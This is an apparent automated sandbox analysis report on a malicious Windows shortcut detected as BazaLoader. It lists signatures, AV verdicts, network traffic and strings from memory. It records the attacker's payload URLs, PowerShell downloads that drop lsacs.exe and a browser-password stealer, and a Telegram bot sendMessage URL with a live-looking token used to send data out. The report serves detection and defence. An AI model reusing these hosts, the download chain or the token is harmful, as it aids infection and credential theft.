Windows Analysis Report
National Development Strategy.lnk

Overview

General Information

Sample Name: National Development Strategy.lnk
Analysis ID: 794563
MD5: 23c0523af70c2144cb3e29101039512d
SHA1: b61ab26a38322ee466e18fa381d0ede106f39e57
SHA256: 176b336f425bc15651672f96f70149873b10a3badfa040c8943bfe54955e043d
Infos:

Detection

BazaLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected BazaLoader
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found URL in windows shortcut file (LNK)
Suspicious powershell command line found
Powershell drops PE file
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: National Development Strategy.lnk ReversingLabs: Detection: 26%
Source: National Development Strategy.lnk Virustotal: Detection: 29% Perma Link
Antivirus detection for URL or domain
Source: https://cloud.archive-downloader.com/P Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/L Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/lsacs.exe Avira URL Cloud: Label: malware
Source: http://cloud.archive-downloader.com Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaATH= Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.hta...6 Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaLMEMX8U Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaNNC: Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaowsINetCookies Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaC: Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.hta... Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.hta= Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.hta Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/file.pdf0y Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/lsacs.exeG Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/lsacs.exe0y Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.hta) Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/ Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/lsacs.exe-OutFile Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/file.pdf Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/s.htaQ Avira URL Cloud: Label: malware
Source: https://cloud.archive-downloader.com/file.pdf-OutFile Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: cloud.archive-downloader.com Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\lsacs.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe ReversingLabs: Detection: 50%
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49703 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49702 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.64.193.26:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\sqlite3.pdb source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7DDC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF6A42C7DDC
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANISCODK DANISCODK
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49703 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49702 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /s.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /data/icons/google_jfk_icons_by_carlosjj/512/chrome.png HTTP/1.1Accept: */*Referer: https://cloud.archive-downloader.com/s.htaAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn1.iconfinder.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /lsacs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: powershell.exe, 00000001.00000002.277825762.0000021CA2169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cloud.archive-downloader.com
Source: mshta.exe, 00000000.00000002.283850237.00000242AB679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.268995139.00000242AB679000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.345843094.0000021CB959D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.362999350.00000216C6813000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.485794048.00000216C681D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.401325937.00000216ACAC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.421111012.00000205613F0000.00000004.00001000.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420755219.000002055FBA0000.00000004.00001000.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.419706555.000002055F953000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422307737.0000020561760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail
Source: steal.exe, 00000013.00000002.422307737.0000020561760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.419706555.000002055F953000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://httpbin.org/
Source: steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json.org
Source: powershell.exe, 00000001.00000002.343734843.0000021CB1625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277825762.0000021CA1689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.343734843.0000021CB14E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.482040340.00000216BE792000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.482040340.00000216BE8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.403692100.00000216AE939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.277825762.0000021CA1481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.403692100.00000216AE731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: steal.exe String found in binary or memory: http://speleotrove.com/decimal/decarith.html
Source: steal.exe, 00000013.00000002.420973206.0000020561390000.00000004.00001000.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422819256.00000205617F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: powershell.exe, 00000003.00000002.403692100.00000216AE939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: steal.exe, 00000013.00000002.421111012.00000205613F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: steal.exe, 00000013.00000003.416114461.0000020561760000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422307737.0000020561760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: steal.exe, 00000013.00000002.422819256.00000205617F0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: steal.exe, steal.exe, 00000013.00000002.420290311.000002055FA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: steal.exe, 00000013.00000003.415858585.00000205617C7000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422537446.00000205617C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: steal.exe, steal.exe, 00000013.00000003.415858585.00000205617C7000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422537446.00000205617C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wwwsearch.sf.net/):
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://yahoo.com/
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.421463686.000002056165E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5885840251:AAG8HoCjrI1QANXkA4oqnJ60lgPP7w86Clg/sendMessage?chat_id=56833
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/;
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/I
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.png
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngC:
Source: mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngl
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngr
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn1.iconfinder.com/y
Source: powershell.exe, 00000001.00000002.277825762.0000021CA2151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.403692100.00000216AE939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com
Source: mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283850237.00000242AB679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.268995139.00000242AB679000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/
Source: mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/L
Source: mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/P
Source: powershell.exe, 00000001.00000002.277353401.0000021C9F6F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277825762.0000021CA2151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277724989.0000021CA1030000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277353401.0000021C9F777000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.346639870.0000021CB9850000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/file.pdf
Source: powershell.exe, 00000001.00000002.277353401.0000021C9F6F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277724989.0000021CA1030000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277200403.0000021C9F640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277353401.0000021C9F777000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/file.pdf-OutFile
Source: powershell.exe, 00000001.00000002.277825762.0000021CA1689000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/file.pdf0y
Source: powershell.exe, 00000003.00000002.403692100.00000216AF894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.361575887.00000216C68AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.485794048.00000216C6853000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/lsacs.exe
Source: powershell.exe, 00000003.00000003.362999350.00000216C683F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.485574108.00000216C67E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.402120021.00000216AE1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.364742097.00000216AC760000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.401325937.00000216ACAC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/lsacs.exe-OutFile
Source: powershell.exe, 00000003.00000002.403692100.00000216AE939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/lsacs.exe0y
Source: powershell.exe, 00000003.00000002.364742097.00000216AC772000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/lsacs.exeG
Source: mshta.exe, 00000000.00000003.268995139.00000242AB679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.284848636.0000024AAE9B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.hta
Source: mshta.exe, 00000000.00000002.283737429.00000242AB5A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.hta)
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.hta...
Source: mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.hta...6
Source: mshta.exe, 00000000.00000002.283737429.00000242AB5A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.hta=
Source: mshta.exe, 00000000.00000002.284032334.00000242AB8A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaATH=
Source: mshta.exe, 00000000.00000002.283737429.00000242AB590000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.284213886.0000024AAE199000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaC:
Source: mshta.exe, 00000000.00000003.282754112.0000024AAE927000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaLMEMX8U
Source: mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaNNC:
Source: mshta.exe, 00000000.00000002.283737429.00000242AB5A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaQ
Source: mshta.exe, 00000000.00000003.282978341.00000242AB5CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283782712.00000242AB5CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.com/s.htaowsINetCookies
Source: powershell.exe, 00000001.00000002.277825762.0000021CA2151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cloud.archive-downloader.comx
Source: steal.exe, 00000013.00000002.425734058.0000020561B70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cloud.google.com/appengine/docs/standard/runtimes
Source: powershell.exe, 00000003.00000002.482040340.00000216BE8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.482040340.00000216BE8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.482040340.00000216BE8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000003.00000002.403692100.00000216AE939000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: steal.exe, 00000013.00000002.475669201.00007FFC120D1000.00000002.00000001.01000000.0000002A.sdmp String found in binary or memory: https://github.com/mhammond/pywin32
Source: powershell.exe, 00000001.00000002.277825762.0000021CA30E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.403692100.00000216B0262000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.419706555.000002055F953000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: mshta.exe, 00000000.00000003.282798069.00000242AB638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comMicrosoft
Source: steal.exe, 00000013.00000003.415858585.00000205617C7000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422537446.00000205617C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000001.00000002.343734843.0000021CB1625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.277825762.0000021CA1689000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.343734843.0000021CB14E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.482040340.00000216BE792000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.482040340.00000216BE8D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: steal.exe String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: steal.exe, 00000013.00000003.416114461.0000020561760000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.422307737.0000020561760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: steal.exe, 00000013.00000003.416327706.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.419706555.000002055F953000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: steal.exe, 00000013.00000002.425734058.0000020561B70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: steal.exe, 00000013.00000002.425734058.0000020561B70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsp
Source: steal.exe String found in binary or memory: https://www.ibm.com/
Source: steal.exe String found in binary or memory: https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm
Source: steal.exe, 00000013.00000003.413550485.000002055F982000.00000004.00000020.00020000.00000000.sdmp, steal.exe, 00000013.00000002.420117958.000002055F9C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: steal.exe, 00000013.00000002.421463686.00000205615F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: unknown DNS traffic detected: queries for: cloud.archive-downloader.com
Source: global traffic HTTP traffic detected: GET /s.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /data/icons/google_jfk_icons_by_carlosjj/512/chrome.png HTTP/1.1Accept: */*Referer: https://cloud.archive-downloader.com/s.htaAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn1.iconfinder.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /lsacs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.64.193.26:443 -> 192.168.2.3:49701 version: TLS 1.2

System Summary
barindex
Found URL in windows shortcut file (LNK)
Source: Initial file Strings: https://cloud.archive-downloader.com/s.htayC:
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\lsacs.exe Jump to dropped file
Detected potential crypto function
